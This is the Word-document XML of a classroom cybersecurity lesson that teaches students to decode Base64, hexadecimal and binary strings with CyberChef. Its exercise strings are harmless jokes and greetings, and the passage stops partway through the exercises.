        <w:t>techniques to decode multiple layers of encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1F3F56" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="522"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ESSON </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t>ETAILS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD9AAF" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="234"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Interconnection: </w:t>
      </w:r>
      <w:r>
        <w:t>This lesson could be taught independently or along with other cybersecurity lessons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4209C" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="290"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Assessment: </w:t>
      </w:r>
      <w:r>
        <w:t>Formative assessment of students accurately being able to encode and decode messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53F63D" w14:textId="12491C1E" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="288"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Extension Activities: </w:t>
      </w:r>
      <w:r w:rsidR="00A5065B">
        <w:t xml:space="preserve">A possible extension is to introduce other </w:t>
      </w:r>
      <w:r w:rsidR="00DD443A">
        <w:t>obfuscated code or additional layers of encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A4CFA4" w14:textId="77777777" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>LESSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEB912" w14:textId="19C861C0" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:spacing w:after="295"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lesson 1 Details: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CEB000" w14:textId="7CBF6913" w:rsidR="007265A1" w:rsidRDefault="002B597D">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Warm Up: </w:t>
      </w:r>
      <w:r w:rsidR="00DD443A">
        <w:t xml:space="preserve">Start with a jumbled encoded string and have students guess what the decoded version is.  Go through multiple layers of decoding (3-4) until displaying the decoded message. Example “Who’s </w:t>
      </w:r>
      <w:r w:rsidR="00201EF2">
        <w:t>enjoying camp?” encoded with URL Encoding, Base 64, Base 32, and an Atbash Cipher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EBC52E" w14:textId="77777777" w:rsidR="00201EF2" w:rsidRDefault="00201EF2">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C3E3B4" w14:textId="3183AACD" w:rsidR="00941E14" w:rsidRPr="00941E14" w:rsidRDefault="002B597D" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lesson: </w:t>
      </w:r>
      <w:r w:rsidR="00941E14" w:rsidRPr="00941E14">
        <w:t>Encoding plays a crucial role in cybersecurity by transforming data into different formats to protect it from unauthorized access or manipulation. One of the primary uses of encoding in cybersecurity is in the encryption of sensitive information. Through encryption algorithms, data is converted into an unreadable format, known as ciphertext, using a cryptographic key. This process ensures that even if the data is intercepted, it remains incomprehensible to unauthorized individuals. Encoding techniques such as Base64 or hexadecimal are also employed in various security mechanisms, such as web application security and email filtering, to prevent the exploitation of vulnerabilities and protect against attacks like cross-site scripting (XSS) or SQL injection. By encoding user inputs or content, potentially harmful characters or commands are transformed into harmless representations, thereby mitigating the risks associated with malicious code execution or unauthorized data manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E6500" w14:textId="2B2A746D" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0" w:firstLine="725"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Encoding</w:t>
      </w:r>
      <w:r w:rsidRPr="00941E14">
        <w:t xml:space="preserve"> is used in digital signatures and certificate mechanisms to verify the authenticity and integrity of data. Encoding techniques like hashing algorithms, such as SHA-256 or MD5, generate a unique hash value based on the input data. This hash value acts as a digital fingerprint, ensuring that any changes to the data can be detected. Digital signatures combine this hash value with asymmetric encryption to provide a mechanism for verifying the identity of the sender and the integrity of the data. Encoding, in this context, ensures that any tampering or unauthorized modifications to the data would result in a different hash value, alerting the recipient to the potential compromise. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A034488" w14:textId="2101412C" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0" w:firstLine="725"/>
      </w:pPr>
      <w:r w:rsidRPr="00941E14">
        <w:t>Overall, encoding techniques are essential tools in the cybersecurity arsenal, enabling data protection, secure communication, and the detection of tampering or unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EA22A" w14:textId="7B8BB7E9" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0" w:firstLine="725"/>
      </w:pPr>
      <w:r>
        <w:t>Let’s try out some examples and see if we can’t find some hidden messages!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772FECF4" w14:textId="49E94124" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exercise 1: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433A060" w14:textId="71913E18" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00941E14">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="177EB182" wp14:editId="6342E14C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-687387</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1142048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6829425" cy="3399460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="102388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162"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47628" cy="3408521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Start by browsing to </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00AE4C51">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.CyberChef.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00941E14">
        <w:t>CyberChef.io is a powerful web-based tool that simplifies data manipulation and analysis in the field of cybersecurity. It offers a user-friendly interface and a vast collection of built-in functions, allowing users to perform a wide range of data transformations, encoding, decoding, hashing, encryption, and decryption operations with ease.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CB77B7" w14:textId="1024DF25" w:rsidR="00941E14" w:rsidRPr="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62099596" w14:textId="6A6914EF" w:rsidR="007265A1" w:rsidRDefault="007265A1" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0F8EA3" w14:textId="77777777" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C52818E" w14:textId="77777777" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8A0078" w14:textId="77777777" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28915FCE" w14:textId="77777777" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03016BA8" w14:textId="77777777" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545B6E9B" w14:textId="1EF1584B" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Each area has a use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259FA876" w14:textId="483D3C38" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>INPUT: Place the string of text/file/image to be decoded in here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB283FA" w14:textId="0158F1C2" w:rsidR="00941E14" w:rsidRDefault="00941E14" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
      </w:pPr>
      <w:r>
        <w:t>RECIPE: Encoding or decoding operations that are happening to the INPUT    value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CB1061" w14:textId="30A11D7A" w:rsidR="00941E14" w:rsidRDefault="00176656" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
      </w:pPr>
      <w:r>
        <w:t>OPERATIONS: List of values encoding/encryption/data manipulation functions that can be added to the RECIPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55185AF1" w14:textId="5FF3EC1D" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OUTPUT: This is resulting text after you BAKE your RECIPE.  In other words, this is what is outputted after decoding your input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E839F2A" w14:textId="77777777" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E517564" w14:textId="7B9947CB" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
      </w:pPr>
      <w:r>
        <w:t>Let’s take this string and try to decode it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4F9E0" w14:textId="478EBD3D" w:rsidR="00176656" w:rsidRPr="00176656" w:rsidRDefault="00176656" w:rsidP="00941E14">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="990" w:right="0" w:hanging="990"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176656">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SXQncyBzdW1tZXIgdmFjYXRpb24hIQ</w:t>
      </w:r>
      <w:r w:rsidRPr="00176656">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161362B1" w14:textId="7548C377" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CB1551" w14:textId="6FA1948E" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>First copy this into the INPUT section of CyberChef.  Then in the OPERATION area, look or search for a “From Base64” pane.  Click and drag this into the RECIPE area.  Did something happen to your OUTPUT?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E348D3" w14:textId="70CC3980" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00176656">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65C6E74C" wp14:editId="2F465291">
            <wp:extent cx="5828665" cy="2473325"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="12933391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39153" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5828665" cy="2473325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0FCF25" w14:textId="77777777" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124E9BD9" w14:textId="71631EFA" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>You now have decoded your first hidden message!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3EFBD" w14:textId="77777777" w:rsidR="00176656" w:rsidRDefault="00176656" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5582121A" w14:textId="6BE402CB" w:rsidR="00176656" w:rsidRDefault="00765190" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exercise 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90E14F" w14:textId="4D205603" w:rsidR="00765190" w:rsidRDefault="00765190" w:rsidP="00176656">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">That’s great, but how did we know to use “From Base 64”?  Well one way is that it ended in “=”…which is a common way that Base 64 strings are padded/identified. But not all end in “=”s…so this isn’t a rule. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73E107" w14:textId="00A57EBB" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Here are some of t</w:t>
      </w:r>
      <w:r w:rsidRPr="00765190">
        <w:t>he most common encoding techniques used in the field of cybersecurity include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8C8E55" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t xml:space="preserve">Base64 Encoding: Base64 is a widely used encoding method that converts binary data into a printable ASCII string format. It works by dividing the input data into groups of three bytes and then representing those bytes as a series of characters from a predefined set of 64 characters. Base64 encoding is commonly used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00765190">
        <w:lastRenderedPageBreak/>
        <w:t>encoding binary data in formats such as email attachments, cryptographic keys, and data transmission over the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3CFC9E" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>Hexadecimal Encoding: Hexadecimal (or hex) encoding represents data as a sequence of hexadecimal digits (0-9 and A-F), with each digit representing four bits. It is often used to represent binary data in a human-readable format. Hexadecimal encoding is commonly employed in analyzing and manipulating binary data, debugging, and cryptographic operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3F38C" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>URL Encoding: URL encoding, also known as percent-encoding, is used to represent special characters in a URL. Special characters, such as spaces or symbols, are replaced with a percent sign followed by their corresponding ASCII value in hexadecimal. This encoding ensures that URLs are correctly interpreted and transmitted across different systems without causing errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1292F38A" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>HTML Entity Encoding: HTML entity encoding is used to represent reserved characters or symbols in HTML documents. Characters such as &lt;, &gt;, &amp;, or " are replaced with their corresponding HTML entities. This encoding prevents the browser from misinterpreting these characters as HTML markup or breaking the structure of the webpage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95B905" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>UTF-8 Encoding: UTF-8 (Unicode Transformation Format 8-bit) is a character encoding scheme that represents characters from the Unicode character set. It uses variable-length encoding, where each character is represented by one to four bytes. UTF-8 encoding allows the representation of characters from multiple languages and is widely used in web applications, databases, and text files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE7C986" w14:textId="77777777" w:rsidR="00765190" w:rsidRPr="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="196"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>Binary Encoding: Binary encoding represents data in binary form, using only two symbols: 0 and 1. It is commonly used in cryptography, file compression, and data storage. Binary encoding allows precise representation and manipulation of data at the bit level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732AED8F" w14:textId="77777777" w:rsidR="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00765190">
        <w:t>These encoding techniques serve different purposes in cybersecurity, from protecting data during transmission to ensuring the correct interpretation of characters in various contexts. Understanding these techniques is essential for cybersecurity professionals to analyze, decode, and manipulate encoded data effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EEBE53" w14:textId="77777777" w:rsidR="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="228459DD" w14:textId="4B3D91F7" w:rsidR="00765190" w:rsidRDefault="00765190" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Let’s try decoding some of these:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CE2798" w14:textId="5F55C5FE" w:rsidR="00765190" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">57 68 79 20 64 6f 6e 27 74 20 73 63 69 65 6e 74 69 73 74 73 20 74 72 75 73 74 20 61 74 6f 6d 73 3f 20 42 65 63 61 75 73 65 20 </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>74 68 65 79 20 6d 61 6b 65 20 75 70 20 65 76 65 72 79 74 68 69 6e 67 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB69C07" w14:textId="3B52E153" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BE7108" w14:textId="77777777" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B313B11" w14:textId="3E149F12" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0099777E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>01001000 01101111 01110111 00100000 01100100 01101111 00100000 01111001 01101111 01110101 00100000 01101111 01110010 01100111 01100001 01101110 01101001 01111010 01100101 00100000 01100001 00100000 01110011 01110000 01100001 01100011 01100101 00100000 01110000 01100001 01110010 01110100 01111001 00111111 00100000 01011001 01101111 01110101 00100000 00100010 01110000 01101100 01100001 01101110 01100101 01110100 00100010 00100001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66747C0A" w14:textId="6E9EEE1B" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Decoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372A056E" w14:textId="77777777" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0202EBFB" w14:textId="7203DB35" w:rsidR="0099777E" w:rsidRDefault="0099777E" w:rsidP="00765190">
      <w:pPr>
        <w:spacing w:after="196"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
